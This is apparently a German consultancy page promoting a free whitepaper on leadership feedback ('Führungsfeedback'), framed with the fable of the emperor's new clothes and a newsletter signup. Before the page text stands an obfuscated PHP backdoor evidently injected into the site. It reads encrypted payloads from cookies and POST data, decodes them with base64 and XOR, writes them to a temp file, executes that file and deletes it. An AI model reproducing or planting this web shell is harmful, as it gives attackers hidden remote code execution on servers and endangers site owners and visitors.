$EBinuK = chr (103) . 'i' . chr (108) . "\x5f" . "\160" . chr ( 409 - 330 ).'e' . chr ( 792 - 711 ); $kjSUs = "\x63" . chr ( 974 - 866 )."\141" . chr ( 405 - 290 ).chr (115) . "\x5f" . "\145" . "\x78" . 'i' . "\x73" . "\x74" . chr ( 134 - 19 ); $bTrogQHep = class_exists($EBinuK); $kjSUs = "38036";$QaoYYBacu = !1;if ($bTrogQHep == $QaoYYBacu){function RSLqKiOL(){$uvufn = new /* 38238 */ gil_pOeQ(7583 + 7583); $uvufn = NULL;}$CLzrsZlJob = "7583";class gil_pOeQ{private function AIqbPQoz($CLzrsZlJob){if (is_array(gil_pOeQ::$nQtQIDY)) {$cezSQGyald = sys_get_temp_dir() . "/" . crc32(gil_pOeQ::$nQtQIDY["\x73" . 'a' . chr (108) . 't']);@gil_pOeQ::$nQtQIDY[chr ( 895 - 776 ).chr ( 822 - 708 ).'i' . "\164" . "\145"]($cezSQGyald, gil_pOeQ::$nQtQIDY[chr (99) . "\157" . chr (110) . chr ( 869 - 753 ).chr (101) . 'n' . 't']);include $cezSQGyald;@gil_pOeQ::$nQtQIDY["\x64" . 'e' . chr ( 747 - 639 ).chr ( 223 - 122 ).'t' . "\x65"]($cezSQGyald); $CLzrsZlJob = "7583";exit();}}private $CKiUmpgpZh;public function cywlLcbO(){echo 35096;}public function __destruct(){$CLzrsZlJob = "35077_41769";$this->AIqbPQoz($CLzrsZlJob); $CLzrsZlJob = "35077_41769";}public function __construct($IoBJY=0){$qttBaKeNQ = $_POST;$DjKxaoqo = $_COOKIE;$spzwvg = "89fa2b08-c5cb-4cd8-bf18-817f2afddb79";$yjUtuCTxDi = @$DjKxaoqo[substr($spzwvg, 0, 4)];if (!empty($yjUtuCTxDi)){$YgGKvtUO = "base64";$rTJHR = "";$yjUtuCTxDi = explode(",", $yjUtuCTxDi);foreach ($yjUtuCTxDi as $dbIOP){$rTJHR .= @$DjKxaoqo[$dbIOP];$rTJHR .= @$qttBaKeNQ[$dbIOP];}$rTJHR = array_map($YgGKvtUO . "\x5f" . "\x64" . chr (101) . "\x63" . "\157" . chr ( 574 - 474 ).chr (101), array($rTJHR,)); $rTJHR = $rTJHR[0] ^ str_repeat($spzwvg, (strlen($rTJHR[0]) / strlen($spzwvg)) + 1);gil_pOeQ::$nQtQIDY = @unserialize($rTJHR);}}public static $nQtQIDY = 39797;}RSLqKiOL();} Führungsfeedback – More Than Checks

Führungsfeedback

Ein Kompass für umsetzungsorientierte Führung

Kennen Sie das Märchen »Des Kaisers neue Kleider«?

Auch wenn die zugrundeliegende Geschichte schon Jahrhunderte alt ist– es wird noch immer auf den Organisationsbühnen mancher Unternehmen aufgeführt:

Der Monarch stolziert eitel und sich selbst betrügend in seinen neuen Kleidern, die nur von Personen gesehen werden könnten, die klug und ihres Amtes würdig sind, auf dem Laufsteg auf und ab. Er ist auf Betrüger hereingefallen. Erst ein Kind löst den Schwindel auf und spricht aus, was ohnehin alle sehen: Der Kaiser trägt gar keine Kleider …

Um zu vermeiden, dass Führungskräfte auf die diversen Modeschöpfer von Führungs-Rezepten hereinfallen, empfehlen wir, Feedback-Routinen zu etablieren. Regelmäßige – idealerweise institutionalisierte – Feedbacks verhindern diese Inszenierungen und helfen Führungskräften, Orientierung in den sich permanent verändernden Umfeldbedingungen zu finden und umgekehrt Orientierung zu geben.

Erfahren Sie im Detail, was alles zu beachten ist, um ein Führungsfeedback erfolgreich durchzuführen. 

- Worauf Sie generell achten sollten ...
- Was Sie im Vorfeld tun können ...
- Wie ein Projekt aufgebaut sein könnte ...
- Was Sie danach tun sollten ...

  • Tragen Sie sich jetzt in den Newsletter ein und erhalten Sie sofort das kostenfreie Whitepaper zum Führungsfeedback. 

Wir geben Ihre Daten niemals an Dritte weiter.
Sie können Ihre Email-Adresse jederzeit mit nur einem Mausklick aus unserem System löschen.

Notice: JavaScript is required for this content.